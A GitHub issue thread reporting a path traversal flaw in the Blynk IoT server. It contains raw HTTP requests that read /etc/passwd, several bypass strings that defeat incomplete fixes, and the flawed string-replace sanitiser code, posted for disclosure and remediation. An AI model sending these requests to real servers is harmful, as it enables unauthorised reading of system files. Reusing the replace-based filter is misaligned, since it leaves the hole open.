### ISSUE TITLE
Path operation vulnerability

### ISSUE THREAD

**Issue by OldFRE** [blynkkk/blynk-server#1256]
1、normal boot software
eg： java -jar server-0.39.6-java8.jar -dataFolder Blynk/

2、Access paths and grab packets 
     Modify HTTP request packet
eg .1
-------------------------------
GET /static/../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.169.1:9443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

--------------------------------

eg .2
--------------------------------
GET /static/js/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.169.1:9443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.169.1:9443/admin
Cookie: session=f14e5805-5870-46f9-8959-b2655945721b

--------------------------------

You can access /etc/passwd.

![0be8c295-98a8-4f93-a727-41c22c4f34d0](https://user-images.githubusercontent.com/19726132/46253875-9ce3c700-c4b8-11e8-9619-5992bb14a680.png)
![b87a970e-f515-4254-9d88-8c3bcff2acd5](https://user-images.githubusercontent.com/19726132/46253871-80478f00-c4b8-11e8-9a57-a05d9762e973.png)
![1499f5c1-f619-4a40-a276-45f261d7c2d7](https://user-images.githubusercontent.com/19726132/46253873-8a698d80-c4b8-11e8-90ce-2539d2200314.png)

Thank you very much ！

**Comment by doom369** [comment]
@OldFRE thanks! Fixed. Please let me know if you need some kind of reward from us (dmitriy@blynk.cc)

**Comment by OldFRE** [comment]
Thank you very much. If there is a reward, can I pay with paypal?
My PayPal (1562574225@qq.com)
If not, then no use. I really want to trouble you！

**Comment by blynkkk** [comment]
Thank you! We sent you a small appreciation for your effort. 🙏

**Comment by OldFRE** [comment]
Thank you very much. Thank you very much for your reward! ；）

**Comment by svnk42** [comment]
> @OldFRE thanks! Fixed. Please let me know if you expect any reward from us ([dmitriy@blynk.cc](mailto:dmitriy@blynk.cc))

Hi there,

I noticed that the implemented fix is not sufficient. Path traversal is still possible e.g. via
`GET /static/js/./..././..././..././..././..././..././..././..././.../etc/passwd`
in the latest version 0.39.7

**Comment by doom369** [comment]
@svnk42 thanks! Build updated.

**Comment by harupu** [comment]
Hi there,

It seems path traversal is still possible.

```
uri = uri.replace("/.", "");
```
This replace just remove `/.` and still allow to bypass with `//...` like below:
```
static//...//...//...//...//...//...//...//.../etc/passwd
```
To remove path traversal attack vector by using replace, we must check `/..` again after replace like below:
```
while(uri.indexOf("../") != -1) {
   uri = uri.replace("../", "");
}
```

I think using getCanonicalPath() is Better way to check path traversal attack.

**Comment by doom369** [comment]
@harupu thanks! Build updated.
I know it requires a more solid fix, will fix it when I have more time.

**Comment by aibaars** [comment]
@doom369 The `isNotSecure` method does not work properly when the server is deployed on windows. https://github.com/blynkkk/blynk-server/blob/7e3cbc0e449913d079010cff4ef05e1178ad189b/server/http-core/src/main/java/cc/blynk/core/http/handlers/StaticFileHandler.java#L289

The code will check the URL for `.\` and will let `./` pass through. In windows both `/` and `\` can be used as path separators. Probably best to best for both.

**Comment by doom369** [comment]
@aibaars agree, thanks!
